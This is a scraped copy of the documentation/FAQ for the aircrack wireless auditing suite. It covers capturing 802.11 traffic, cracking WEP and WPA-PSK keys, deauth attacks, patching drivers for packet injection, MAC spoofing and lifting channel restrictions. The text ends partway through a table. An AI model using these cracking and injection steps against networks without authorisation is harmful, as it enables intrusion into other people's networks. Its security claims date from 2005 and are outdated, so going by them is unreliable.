README.txt
上传用户:fubang
上传日期:2009-06-18
资源大小:2071k
文件大小:51k
源码类别:

其他

开发平台:

Unix_Linux

  1.                             aircrack documentation
  2. -------------------------------------------------------------------------------
  3. What is aircrack ?
  4.     aircrack is a set of tools for auditing wireless networks:
  5.       + airodump: 802.11 packet capture program
  6.       + aireplay: 802.11 packet injection program
  7.       + aircrack: static WEP and WPA-PSK key cracker
  8.       + airdecap: decrypts WEP/WPA capture files
  9.     This document has been translated in spanish language (thanks to ShaKarO).
  10. Is there an aircrack discussion forum ?
  11.     Sure: http://100h.org/forums/. Also, check out #aircrack on
  12.     irc.freenode.net
  13. Where to download aircrack ?
  14.     The official download location is http://www.cr0.net:8040/code/network/.
  15.     However, if you can't access port 8040 for some reason, you may use this
  16.     mirror instead: http://100h.org/wlan/aircrack/.
  17.     Aircrack is included in the Troppix LiveCD, which features { Prism2 /
  18.     PrismGT / Realtek / Atheros / Ralink } drivers patched for packet
  19.     injection, as well as the acx100, ipw2200 (Centrino) and zd1211 drivers.
  20. It says "cygwin1.dll not found" when I start aircrack.exe.
  21.     You can download this library from: http://100h.org/wlan/aircrack/.
  22.     To use aircrack, drag&drop your .cap or .ivs capture file(s) over
  23.     aircrack.exe. If you want to pass options to the program you'll have to
  24.     start a shell (cmd.exe) and manually type the command line; there is also a
  25.     GUI for aircrack, developed by hexanium.
  26.     Example:
  27.     C:TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap ...
  28.     See below for a list of options.
  29. How do I crack a static WEP key ?
  30.     The basic idea is to capture as much encrypted traffic as possible using
  31.     airodump. Each WEP data packet has an associated 3-byte Initialization
  32.     Vector (IV): after a sufficient number of data packets have been collected,
  33.     run aircrack on the resulting capture file. aircrack will then perform a
  34.     set of statistical attacks developped by a talented hacker named KoreK.
  35. How do I know my WEP key is correct ?
  36.     There are two authentication modes for WEP:
  37.       + Open-System Authentication: this is the default mode. All clients are
  38.         accepted by the AP, and the key is never checked: association is always
  39.         granted. However if your key is incorrect you won't be able to receive
  40.         or send packets (because decryption will fail), so DHCP, ping etc. will
  41.         timeout.
  42.       + Shared-Key Authentication: the client has to encrypt a challenge before
  43.         association is granted by the AP. This mode is flawed and leads to
  44.         keystream recovery, so it's never enabled by default.
  45.     In summary, just because you seem to have successfully connected to the
  46.     access point doesn't mean your WEP key is correct ! To check your WEP key,
  47.     try to decrypt a capture file with the airdecap program.
  48. How many IVs are required to crack WEP ?
  49.     WEP cracking is not an exact science. The number of required IVs depends on
  50.     the WEP key length, and it also depends on your luck. Usually, 40-bit WEP
  51.     can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with
  52.     1.000.000 IVs; if you're out of luck you may need two million IVs, or more.
  53.     There's no way to know the WEP key length: this information is kept hidden
  54.     and never announced, either in management or data packets; as a
  55.     consequence, airodump can not report the WEP key length. Thus, it is
  56.     recommended to run aircrack twice: when you have 250.000 IVs, start
  57.     aircrack with "-n 64" to crack 40-bit WEP. Then if the key isn't found,
  58.     restart aircrack (without the -n option) to crack 104-bit WEP.
  59. I can't seem to capture any IVs !
  60.     Possible reasons:
  61.       + You are standing too far from the access point.
  62.       + There is no traffic on the target wireless network.
  63.       + There is some G traffic but you're capturing in B mode.
  64.       + Something is wrong with your card (firmware problem ?)
  65.     By the way, beacons are just unencrypted announcement packets. They're
  66.     totally useless for WEP cracking.
  67. I've been unable to crack this AP !
  68.     Shit happens.
  69. Why is there no Windows version of aireplay ?
  70.     The PEEK driver doesn't support 802.11 packet injection; I will not port
  71.     aireplay on Win32. However, there are commercial alternatives:
  72.     Prism cards: http://www.tuca-software.com/transmit.php
  73.     Atheros cards: http://www.tamos.com/htmlhelp/commwifi/pgen.htm
  74. Is my card compatible with airodump / aireplay ?
  75.     First of all, search Google to find which chipset your card has. For
  76.     example, if you have a Linksys WPC54G search for "wpc54g chipset linux".
  77.      +----------------------------------------------------------------------+
  78.      |             |   Supported by    |    Supported by    | Supported by  |
  79.      |   Chipset   |   airodump for    | airodump for Linux | aireplay for  |
  80.      |             |     Windows ?     |         ?          |    Linux ?    |
  81.      |-------------+-------------------+--------------------+---------------|
  82.      |             | YES (Agere driver | YES (patched       | NO (firmware  |
  83.      | HermesI     | )                 | orinoco driver)    | corrupts the  |
  84.      |             |                   |                    | MAC header)   |
  85.      |-------------+-------------------+--------------------+---------------|
  86.      |             |                   | YES (HostAP or     | YES (PCI and  |
  87.      |             | NO, but see       | wlan-ng driver),   | CardBus only, |
  88.      | Prism2/3    | LinkFerret for an | STA firmware 1.5.6 | driver        |
  89.      |             | alternative       | or newer required  | patching      |
  90.      |             |                   |                    | required)     |
  91.      |-------------+-------------------+--------------------+---------------|
  92.      |             |                   | FullMAC: YES (     | YES (driver   |
  93.      | PrismGT     | YES (PrismGT      | prism54 driver,    | patching      |
  94.      |             | driver)           | SoftMAC: NOT YET ( | recommended)  |
  95.      |             |                   | prism54usb)        |               |
  96.      |-------------+-------------------+--------------------+---------------|
  97.      |             | CardBus: YES (    |                    |               |
  98.      |             | Atheros driver),  | YES (PCI and       | YES (driver   |
  99.      | Atheros     | PCI: NO (see      | CardBus only,      | patching      |
  100.      |             | CommView WiFi     | madwifi driver)    | required)     |
  101.      |             | instead)          |                    |               |
  102.      |-------------+-------------------+--------------------+---------------|
  103.      |             |                   | YES (              | UNSTABLE      |
  104.      | RTL8180     | YES (Realtek      | rtl8180-sa2400     | (driver       |
  105.      |             | driver)           | driver)            | patching      |
  106.      |             |                   |                    | required)     |
  107.      |-------------+-------------------+--------------------+---------------|
  108.      |             | YES? (Cisco       | YES (airo driver,  | NO (firmware  |
  109.      | Aironet     | driver)           | firmware 4.25.30   | issue)        |
  110.      |             |                   | recommended)       |               |
  111.      |-------------+-------------------+--------------------+---------------|
  112.      |             |                   | YES (rt2500 /      | YES (driver   |
  113.      | Ralink      | NO                | rt2570 driver)     | patching      |
  114.      |             |                   |                    | required)     |
  115.      |-------------+-------------------+--------------------+---------------|
  116.      |             |                   | PARTIAL: the       |               |
  117.      | Centrino b  | NO                | ipw2100 driver     | NO            |
  118.      |             |                   | doesn't discard    |               |
  119.      |             |                   | corrupted packets  |               |
  120.      |-------------+-------------------+--------------------+---------------|
  121.      | Centrino b/ |                   | YES (ipw2200       | NO (firmware  |
  122.      | g           | NO                | driver, 1.0.6      | drops         |
  123.      |             |                   | recommended)       | packets)      |
  124.      |-------------+-------------------+--------------------+---------------|
  125.      |             | Old models only ( | NOT YET (bcm43xx   |               |
  126.      | Broadcom    | BRCM driver)      | driver, Linux >=   | NO            |
  127.      |             |                   | 2.6.14 required)   |               |
  128.      |-------------+-------------------+--------------------+---------------|
  129.      | TI (ACX100  | NO                | UNTESTED (acx100   | NO            |
  130.      | / ACX111)   |                   | driver)            |               |
  131.      |-------------+-------------------+--------------------+---------------|
  132.      | ZyDAS 1201  | NO                | YES (zd1211 driver | NO            |
  133.      |             |                   | )                  |               |
  134.      |-------------+-------------------+--------------------+---------------|
  135.      | Others      | NO                | UNKNOWN            | NO            |
  136.      | (Marvel...) |                   |                    |               |
  137.      +----------------------------------------------------------------------+
  138. The PEEK driver does not recognize my card.
  139.     Some cards are not recognized by the Windows drivers above, even though
  140.     they have the correct chipset. In this case, open the hardware manager,
  141.     select your card, "Update the driver", select "Install from a specific
  142.     location", select "Don't search, I will choose the driver to install",
  143.     click "Have disk", set the path to where the driver has been unzipped,
  144.     uncheck "Show compatible hardware", and finally choose the driver.
  145. I have a Prism2 card, but airodump / aireplay doesn't seem to work !
  146.     First step, make sure you aren't using the orinoco driver. If the interface
  147.     name is wlan0, then the driver is HostAP or wlan-ng. However if the
  148.     interface name is eth0 or eth1, then the driver is orinoco and you must
  149.     disable the driver (use cardctl ident to know you card identifier, then
  150.     edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart
  151.     cardmgr).
  152.     Also, it can be a firmware problem. Old firmwares have trouble with test
  153.     mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure
  154.     yours is up to date -- see below for instructions. The recommended station
  155.     firmware version is 1.7.4. If it doesn't work well (kismet or airodump
  156.     stalls after capturing a couple of packets), try STA 1.5.6 instead (either
  157.     s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones).
  158.     On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the
  159.     card seems stuck, you will have to reset it, or use HostAP instead.
  160.     Injection is currently broken on Prism2 USB devices w/ wlan-ng.
  161.     Note: a Windows XP driver for Prism2 cards with WPA/TKIP support can be
  162.     found here: http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe.
  163. I have an Atheros card, and the madwifi patch crashes the kernel /
  164. aireplay keeps saying enhanced RTC support isn't available.
  165.     There are quite a few problems with some versions of the Linux 2.6 branch
  166.     (especially before 2.6.11 was released) that will cause a kernel panic when
  167.     injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is
  168.     just broken. Thus, is it highly recommended to use either Linux 2.6.11.x or
  169.     newer.
  170. How do I update my Prism2 firmware ?
  171.     The simplest is to upgrade the firmware with WinUpdate - this requires to
  172.     have the WPC11 driver v2.5 installed. Both can be found at: http://100h.org
  173.     /wlan/linux/prism2/.
  174.     You may also update the firmware with patched HostAP (see below for
  175.     instructions on how to patch and install HostAP). Alternatively, you may
  176.     boot the Troppix Live CD (which already has a patched hostap driver and the
  177.     prism2_srec utility).
  178.     Now that HostAP is loaded, you can check your firmware's primary and
  179.     station version with this command:
  180.     # dmesg | grep wifi
  181.     hostap_cs: Registered netdevice wifi0
  182.     wifi0: NIC: id=0x800c v1.0.0
  183.     wifi0: PRI: id=0x15 v1.1.1  (primary firmware is 1.1.1)
  184.     wifi0: STA: id=0x1f v1.7.4  (station firmware is 1.7.4)
  185.     wifi0: registered netdevice wlan0
  186.     If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2
  187.     and MUST use STA firmware version 1.5.6 (s1010506.hex). Otherwise, you
  188.     should use PRI 1.1.1 / STA 1.7.4 which is the most stable firmware version
  189.     for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have
  190.     reported having trouble with them.
  191.     To update the firmware, you'll need prism2_srec from the hostap-utils
  192.     package; if it's not present on your system, download and compile
  193.     hostap-utils:
  194.     wget http://100h.org/wlan/linux/prism2/hostap-utils-0.4.0.tar.gz
  195.     tar -xvzf hostap-utils-0.4.0.tar.gz
  196.     cd hostap-utils-0.4.0
  197.     make
  198.     Some Prism2 cards have been restricted to a certain set of channels because
  199.     of country regulation. You can activate all 14 channels with the following
  200.     commands:
  201.     ./prism2_srec wlan0 -D > pda; cp pda pda.bak
  202.     Edit pda and put 3FFF at offset 0104 (line 24)
  203.     Finally, download the firmware and flash your card. If the NIC id is
  204.     between 0x8002 and 0x8008:
  205.     wget http://100h.org/wlan/linux/prism2/s1010506.hex
  206.     ./prism2_srec -v -f wlan0 s1010506.hex -P pda
  207.     Otherwise:
  208.     wget http://100h.org/wlan/linux/prism2/pk010101.hex
  209.     wget http://100h.org/wlan/linux/prism2/sf010704.hex
  210.     ./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda
  211.     If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not
  212.     supported", the HostAP driver is not loaded and you must install it. If you
  213.     get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported",
  214.     then your HostAP driver has not been patched for non-volatile download
  215.     support.
  216. Which is the best card to buy ?
  217.     The best chipset nowadays is Atheros; it is very well supported under
  218.     Linux, and also under Windows (PCMCIA/CardBus only). The latest madwifi
  219.     patch makes it possible to inject raw 802.11 packets either in Managed and
  220.     Monitor mode at arbitrary b/g speeds.
  221.     Ralink makes some nice b/g chipsets, and has been very cooperative with the
  222.     open-source community to release GPL drivers. Packet injection is now fully
  223.     supported under Linux on PCI/CardBus RT2500 cards, and also works on USB
  224.     RT2570 devices.
  225.     Here's a list of recommended cards:
  226.      +----------------------------------------------------------------------+
  227.      |   Card   |  Type   | Chipset | Antenna  | Price | Windows  |  Linux  |
  228.      |   name   |         |         |          |       | support  | support |
  229.      |----------+---------+---------+----------+-------+----------+---------|
  230.      | MSI      | PCI     | Ralink  | RP-SMA   | E30   | No       | Yes     |
  231.      | PC54G2   |         |         |          |       |          |         |
  232.      |----------+---------+---------+----------+-------+----------+---------|
  233.      | MSI      | CardBus | Ralink  | Internal | E30   | No       | Yes     |
  234.      | CB54G2   |         |         |          |       |          |         |
  235.      |----------+---------+---------+----------+-------+----------+---------|
  236.      | Linksys  |         |         |          |       |          |         |
  237.      | WMP54G   | PCI     | Ralink  | RP-SMA   | E40   | No       | Yes     |
  238.      | v4       |         |         |          |       |          |         |
  239.      |----------+---------+---------+----------+-------+----------+---------|
  240.      | Linksys  |         |         |          |       |          |         |
  241.      | WUSB54G  | USB     | Ralink  | Internal | E40   | No       | Yes     |
  242.      | v4       |         |         |          |       |          |         |
  243.      |----------+---------+---------+----------+-------+----------+---------|
  244.      | D-Link   | USB     | Ralink  | Internal | E45   | No       | Yes     |
  245.      | DWL-G122 |         |         |          |       |          |         |
  246.      |----------+---------+---------+----------+-------+----------+---------|
  247.      | Netgear  | USB     | PrismGT | Internal | E40   | airodump | No      |
  248.      | WG111    |         | SoftMAC |          |       |          |         |
  249.      |----------+---------+---------+----------+-------+----------+---------|
  250.      | Netgear  | PCI     | Atheros | RP-SMA   | E50   | CommView | Yes     |
  251.      | WG311T   |         |         |          |       | WiFi     |         |
  252.      |----------+---------+---------+----------+-------+----------+---------|
  253.      | Netgear  | CardBus | Atheros | Internal | E50   | airodump | Yes     |
  254.      | WG511T   |         |         |          |       |          |         |
  255.      |----------+---------+---------+----------+-------+----------+---------|
  256.      | Netgear  | CardBus | Atheros | Internal | E100  | airodump | Yes     |
  257.      | WAG511   |         |         |          |       |          |         |
  258.      |----------+---------+---------+----------+-------+----------+---------|
  259.      | Proxim   | CardBus | Atheros | MC +     | E110  | airodump | Yes     |
  260.      | 8470-WD  |         |         | Int.     |       |          |         |
  261.      +----------------------------------------------------------------------+
  262.     Note: there are some cheaper models with a similar name (WG511, WG311 and
  263.     DWL-G520+); those cards are not Atheros-based. Also, the Peek driver does
  264.     not support recent Atheros cards, so you'll have to use CommView WiFi
  265.     instead.
  266. How do I use airodump for Windows ?
  267.     First of all, make sure that your card is compatible (see table above) and
  268.     that you have installed the proper driver.
  269.     When running airodump, you should specify:
  270.       + The network interface index number, which must be picked in the list
  271.         displayed by airodump.
  272.       + The network interface type ('o' for HermesI and Realtek, 'a' for
  273.         Aironet, Atheros, Broadcom and PrismGT).
  274.       + The channel number, between 1 and 14. You can also specify 0 to hop
  275.         between all channels.
  276.       + The output prefix. For example, if the prefix is "foo", then airodump
  277.         will create foo.cap (captured packets) and foo.txt (CSV statistics). If
  278.         foo.cap already exists, airodump will resume the capture session by
  279.         appending the packets to it.
  280.       + The "only IVs" flag. Specify 1 if you just want to save the IVs from
  281.         WEP data packets. This saves space, but the resulting file (foo.ivs)
  282.         will only be useful for WEP cracking.
  283.     To stop capturing packets, press Ctrl-C. You may get a blue screen, this is
  284.     due to a bug in the PEEK driver not cleanly exiting monitor mode. Also, the
  285.     capture file may be empty. The cause of this bug is unknown.
  286. Why can't I compile airodump and aireplay on BSD / Mac OS X ?
  287.     Both airodump and aireplay sources are linux-specific. There are no plans
  288.     to port them on any other operating system.
  289. How do I use airodump for Linux ?
  290.     Before running airodump, you may start the airmon.sh script to list the
  291.     detected wireless interfaces. It is possible, but not recommended, to run
  292.     Kismet and airodump at the same time.
  293.       usage: airodump <interface> <output prefix> [channel] [IVs flag]
  294.       Specify 0 as the channel to hop between 2.4 GHz channels.
  295.       Set the optional IVs flag to 1 to only save the captured
  296.       IVs - the resulting file is only useful for WEP cracking.
  297.       If the gpsd daemon is running, airodump will retrieve and
  298.       save the current GPS coordinates in text format.
  299.     You can convert a .cap / .dump file to .ivs format with the pcap2ivs
  300.     program (linux only).
  301. airodump keeps switching between WEP and WPA.
  302.     This is happening because your driver doesn't discard corrupted packets
  303.     (that have an invalid CRC). If it's a Centrino b, it just can't be helped;
  304.     go buy a better card. If it's a Prism2, try upgrading the firmware.
  305. What's the meaning of the fields displayed by airodump ?
  306.     airodump will display a list of detected access points, and also a list of
  307.     connected clients ("stations"). Here's an example screenshot using a Prism2
  308.     card with HostAP:
  309.       +--------------------------------------------------------------------+
  310.       |  BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID     |
  311.       |                                                                    |
  312.       |  00:13:10:30:24:9C   46       15     3416   6  54. WEP   the ssid  |
  313.       |  00:09:5B:1F:44:10   36       54        0  11  11  OPN   NETGEAR   |
  314.       |                                                                    |
  315.       |  BSSID              STATION            PWR  Packets  Probes        |
  316.       |                                                                    |
  317.       |  00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid      |
  318.       |  00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid      |
  319.       |                                                                    |
  320.       +--------------------------------------------------------------------+
  321.      +----------------------------------------------------------------------+
  322.      |  Field  |                        Description                         |
  323.      |---------+------------------------------------------------------------|
  324.      | BSSID   | MAC address of the access point.                           |
  325.      |---------+------------------------------------------------------------|
  326.      |         | Signal level reported by the card. Its signification       |
  327.      | PWR     | depends on the driver, but as the signal gets higher you   |
  328.      |         | get closer to the AP or the station. If PWR == -1, the     |
  329.      |         | driver doesn't support signal level reporting.             |
  330.      |---------+------------------------------------------------------------|
  331.      |         | Number of announcements packets sent by the AP. Each       |
  332.      | Beacons | access point sends about ten beacons per second at the     |
  333.      |         | lowest rate (1M), so they can usually be picked up from    |
  334.      |         | very far.                                                  |
  335.      |---------+------------------------------------------------------------|
  336.      | # Data  | Number of captured data packets (if WEP, unique IV count), |
  337.      |         | including data broadcast packets.                          |
  338.      |---------+------------------------------------------------------------|
  339.      |         | Channel number (taken from beacon packets). Note:          |
  340.      | CH      | sometimes packets from other channels are captured even if |
  341.      |         | airodump is not hopping, because of radio interference.    |
  342.      |---------+------------------------------------------------------------|
  343.      |         | Maximum speed supported by the AP. If MB = 11, it's        |
  344.      | MB      | 802.11b, if MB = 22 it's 802.11b+ and higher rates are     |
  345.      |         | 802.11g. The dot (after 54 above) indicates short preamble |
  346.      |         | is supported.                                              |
  347.      |---------+------------------------------------------------------------|
  348.      |         | Encryption algorithm in use. OPN = no encryption, "WEP?" = |
  349.      | ENC     | WEP or higher (not enough data to choose between WEP and   |
  350.      |         | WPA), WEP (without the question mark) indicates static or  |
  351.      |         | dynamic WEP, and WPA if TKIP or CCMP is present.           |
  352.      |---------+------------------------------------------------------------|
  353.      |         | The so-called "SSID", which can be empty if SSID hiding is |
  354.      | ESSID   | activated. In this case, airodump will try to recover the  |
  355.      |         | SSID from probe responses and association requests.        |
  356.      |---------+------------------------------------------------------------|
  357.      |         | MAC address of each associated station. In the screenshot  |
  358.      | STATION | above, two clients have been detected (00:09:5B:EB:C5:2B   |
  359.      |         | and 00:02:2D:C1:5D:1F).                                    |
  360.      +----------------------------------------------------------------------+
  361. How do I merge multiple capture files ?
  362.     You may use the mergecap program (part of the ethereal-common package or
  363.     the win32 distribution):
  364.     mergecap -w out.cap test1.cap test2.cap test3.cap
  365.     .ivs files can be merged with the "mergeivs" program (linux only).
  366. Can I use Ethereal to capture 802.11 packets ?
  367.     Under Linux, simply setup the card in monitor mode with the airmon.sh
  368.     script. Under Windows, Ethereal can NOT capture 802.11 packets.
  369. Can Ethereal decode WEP data packets ?
  370.     Yes. Go to Edit -> Preferences -> Protocols -> IEEE 802.11, select 1 in the
  371.     "WEP key count" and enter your WEP key below.
  372. How do I change my card's MAC address ?
  373.     Under linux: for example, if you have an Atheros card:
  374.     ifconfig ath0 down
  375.     ifconfig ath0 hw ether 00:11:22:33:44:55
  376.     ifconfig ath0 up
  377.     Under Windows, you may use macmakeup.
  378. How do I use aircrack ?
  379.     Usage: aircrack [options] <capture file(s)>
  380.     You can specify multiple input files (either in .cap or .ivs format). Also,
  381.     you can run both airodump and aircrack at the same time: aircrack will
  382.     auto-update when new IVs are available.
  383.     Here's a summary of all available options:
  384.      +----------------------------------------------------------------------+
  385.      | Option | Param. |                    Description                     |
  386.      |--------+--------+----------------------------------------------------|
  387.      | -a     | amode  | Force attack mode (1 = static WEP, 2 = WPA-PSK).   |
  388.      |--------+--------+----------------------------------------------------|
  389.      |        |        | If set, all IVs from networks with the same ESSID  |
  390.      | -e     | essid  | will be used. This option is also required for     |
  391.      |        |        | WPA-PSK cracking if the ESSID is not broadcasted   |
  392.      |        |        | (hidden).                                          |
  393.      |--------+--------+----------------------------------------------------|
  394.      | -b     | bssid  | Select the target network based on the access      |
  395.      |        |        | point's MAC address.                               |
  396.      |--------+--------+----------------------------------------------------|
  397.      | -p     | nbcpu  | On SMP systems, set this option to the number of   |
  398.      |        |        | CPUs.                                              |
  399.      |--------+--------+----------------------------------------------------|
  400.      | -q     | none   | Enable quiet mode (no status output until the key  |
  401.      |        |        | is found, or not).                                 |
  402.      |--------+--------+----------------------------------------------------|
  403.      | -c     | none   | (WEP cracking) Restrict the search space to        |
  404.      |        |        | alpha-numeric characters only (0x20 - 0x7F).       |
  405.      |--------+--------+----------------------------------------------------|
  406.      | -t     | none   | (WEP cracking) Restrict the search space to binary |
  407.      |        |        | coded decimal hex characters.                      |
  408.      |--------+--------+----------------------------------------------------|
  409.      | -d     | start  | (WEP cracking) Set the beginning the WEP key (in   |
  410.      |        |        | hex), for debugging purposes.                      |
  411.      |--------+--------+----------------------------------------------------|
  412.      |        |        | (WEP cracking) MAC address to filter WEP data      |
  413.      | -m     | maddr  | packets. Alternatively, specify -m                 |
  414.      |        |        | ff:ff:ff:ff:ff:ff to use all and every IVs,        |
  415.      |        |        | regardless of the network.                         |
  416.      |--------+--------+----------------------------------------------------|
  417.      |        |        | (WEP cracking) Specify the length of the key: 64   |
  418.      | -n     | nbits  | for 40-bit WEP, 128 for 104-bit WEP, etc. The      |
  419.      |        |        | default value is 128.                              |
  420.      |--------+--------+----------------------------------------------------|
  421.      |        |        | (WEP cracking) Only keep the IVs that have this    |
  422.      | -i     | index  | key index (1 to 4). The default behaviour is to    |
  423.      |        |        | ignore the key index.                              |
  424.      |--------+--------+----------------------------------------------------|
  425.      |        |        | (WEP cracking) By default, this parameter is set   |
  426.      |        |        | to 2 for 104-bit WEP and to 5 for 40-bit WEP.      |
  427.      | -f     | fudge  | Specify a higher value to increase the bruteforce  |
  428.      |        |        | level: cracking will take more time, but with a    |
  429.      |        |        | higher likelyhood of success.                      |
  430.      |--------+--------+----------------------------------------------------|
  431.      |        |        | (WEP cracking) There are 17 korek statistical      |
  432.      |        |        | attacks. Sometimes one attack creates a huge false |
  433.      | -k     | korek  | positive that prevents the key from being found,   |
  434.      |        |        | even with lots of IVs. Try -k 1, -k 2, ... -k 17   |
  435.      |        |        | to disable each attack selectively.                |
  436.      |--------+--------+----------------------------------------------------|
  437.      | -x     | none   | (WEP cracking) Enable bruteforcing of the last two |
  438.      |        |        | keybytes.                                          |
  439.      |--------+--------+----------------------------------------------------|
  440.      |        |        | (WEP cracking) This is an experimental single      |
  441.      | -y     | none   | bruteforce attack which should only be used when   |
  442.      |        |        | the standard attack mode fails with more than one  |
  443.      |        |        | million IVs.                                       |
  444.      |--------+--------+----------------------------------------------------|
  445.      | -w     | words  | (WPA cracking) Path to a wordlist.                 |
  446.      +----------------------------------------------------------------------+
  447. Could you implement a resume option in aircrack ?
  448.     There are no plans to implement this feature.
  449. How can I crack a WPA-PSK network ?
  450.     You must sniff until a handshake takes place between a wireless client and
  451.     the access point. To force the client to reauthenticate, you can start a
  452.     deauth attack with aireplay. Also, a good dictionary is required; see
  453.     http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
  454.     FYI, it's not possible to pre-compute large tables of Pairwise Master Keys
  455.     like rainbowcrack does, since the passphrase is salted with the ESSID.
  456. Will WPA be cracked in the future ?
  457.     It's extremely unlikely that WPA will be cracked just like WEP was.
  458.     The major problem with WEP is that the shared key is appended to the IV;
  459.     the result is directly used to feed RC4. This overly simple construction is
  460.     prone to a statistical attack, since the first ciphertext bytes are
  461.     strongly correlated with the shared key (see Andrew Roos' paper). There are
  462.     basically two counter-measures against this attack: 1. mix the IV and the
  463.     shared key using a hash function or 2. discard the first 256 bytes of RC4's
  464.     output.
  465.     There has been some disinformation in the news about the "flaws" of TKIP:
  466.         For now, TKIP is reasonably secure but it is also living on borrowed
  467.         time since it still relies on the same RC4 algorithm that WEP relied
  468.         on.
  469.     Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is
  470.     mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key,
  471.     so there's no statistical correlation at all. Furthermore, WPA provides
  472.     counter-measures against active attacks (traffic reinjection), includes a
  473.     stronger message integrity code (michael), and has a very robust
  474.     authentication protocol (the 4-way handshake). The only vulnerability so
  475.     far is a dictionnary attack, which fails if the passphrase is robust
  476.     enough.
  477.     WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in
  478.     counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of
  479.     HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1,
  480.     but neither are going to be cracked in the near future.
  481. I have more than one million IVs, but aircrack doesn't find the key !
  482.     Possible reasons:
  483.       + Out of luck: you must capture more IVs. Usually, 104-bit WEP can be
  484.         cracked with about one million IVs, but sometimes more IVs are needed.
  485.          
  486.       + If all votes seem equal, or if there are many negative votes, then the
  487.         capture file is corrupted, or the key is not static (EAP/802.1X in use
  488.         ?).
  489.          
  490.       + A false positive prevented the key from being found. Try to disable
  491.         each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the
  492.         experimental bruteforce attacks (-x / -y).
  493. I've found the key, how do I decrypt a capture file ?
  494.     You may use the airdecap program:
  495.       usage: airdecap [options] <pcap file>
  496.           -l       : don't remove the 802.11 header
  497.           -b bssid : access point MAC address filter
  498.           -k pmk   : WPA Pairwise Master Key in hex
  499.           -e essid : target network ascii identifier
  500.           -p pass  : target network WPA passphrase
  501.           -w key   : target network WEP key in hex
  502.       examples:
  503.       airdecap -b 00:09:5B:10:BC:5A open-network.cap
  504.       airdecap -w 11A3E229084349BC25D97E2939 wep.cap
  505.       airdecap -e 'the ssid' -p passphrase  tkip.cap
  506. How do I recover my WEP key in Windows ?
  507.     You may use the WZCOOK program which recovers WEP keys from XP's Wireless
  508.     Zero Configuration utility. This is experimental software, so it may or may
  509.     not work depending on your service pack level.
  510. Does WZCOOK also recovers WPA keys ?
  511.     WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is
  512.     the result of the passphrase hashed 8192 times together with the ESSID and
  513.     the ESSID length. The passphrase itself can't be recovered -- however,
  514.     knowing the PMK is enough to connect to a WPA-protected wireless network
  515.     with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf
  516.     configuration file should look like:
  517.     network={
  518.         ssid="my_essid"
  519.         pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
  520.     }
  521. How do I patch the driver for injection with aireplay ?
  522.     As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC),
  523.     Atheros, RTL8180 and Ralink. Injection on Centrino, Hermes, ACX1xx,
  524.     Aironet, ZyDAS, Marvell and Broadcom is not supported because of firmware
  525.     and/or driver limitations.
  526.     Injection on Prism2 and Atheros is still pretty much experimental; if your
  527.     card appears to hang (no packets captured or injected), disable the
  528.     interface, reload the drivers and re-insert the card. Also consider
  529.     updating the firmware (if Prism2).
  530.     All drivers must be patched so as to support injection in Monitor mode. You
  531.     will need linux headers that match your current running kernel; if not, you
  532.     will have to download the linux source and compile a custom kernel.
  533.     If you have trouble patching and compiling stuff, you may want to use the
  534.     Troppix LiveCD, which includes patched device drivers.
  535.       + Installing the madwifi driver (Atheros cards)
  536.         Note 1: you'll need uudecode from the sharutils package.
  537.         Note 2: the 20051025 patch should also work with newer version of the
  538.         madwifi CVS.
  539.         Note 3: if you use wpa_supplicant, you should recompile it (older
  540.         versions are not compatible with the current madwifi CVS), and make
  541.         sure CONFIG_DRIVER_MADWIFI=y is uncommented in config.h.
  542.         Note 4: with the current madwifi, it is no longer needed to run "iwpriv
  543.         ath0 mode 2", since the driver allows injection in mode 0 using the new
  544.         athXraw interface.
  545.                          +-----------------------------------+
  546.                          | Allowed modes |  Physical medium  |
  547.                          |---------------+-------------------|
  548.                          | Mode 0        | Automatic (a/b/g) |
  549.                          |---------------+-------------------|
  550.                          | Mode 1        | 802.11a only      |
  551.                          |---------------+-------------------|
  552.                          | Mode 2        | 802.11b only      |
  553.                          |---------------+-------------------|
  554.                          | Mode 3        | 802.11g only      |
  555.                          +-----------------------------------+
  556.         ifconfig ath0 down
  557.         rmmod wlan_wep ath_rate_sample ath_rate_onoe 
  558.               ath_pci wlan ath_hal 2>/dev/null
  559.         find /lib/modules -name 'ath*'  -exec rm -v {} ; 2>/dev/null
  560.         find /lib/modules -name 'wlan*' -exec rm -v {} ; 2>/dev/null
  561.         cd /usr/src
  562.         wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20051025.tgz
  563.         wget http://100h.org/wlan/linux/patches/madwifi-cvs-20051025.patch
  564.         tar -xvzf madwifi-cvs-20051025.tgz
  565.         cd madwifi-cvs-20051025
  566.         patch -Np1 -i ../madwifi-cvs-20051025.patch
  567.         make KERNELPATH=/usr/src/linux-<insert version>
  568.         make install
  569.         modprobe ath_pci
  570.         It is now possible to set the transmit rate with madwifi (and also
  571.         rt2570). The recommended rate is 5.5 Mbps, but you can lower it or
  572.         raise it, depending on your distance from the AP. For example:
  573.         iwconfig ath0 rate 24M
  574.                    +----------------------------------------------+
  575.                    | Modulation |          Allowed rates          |
  576.                    |------------+---------------------------------|
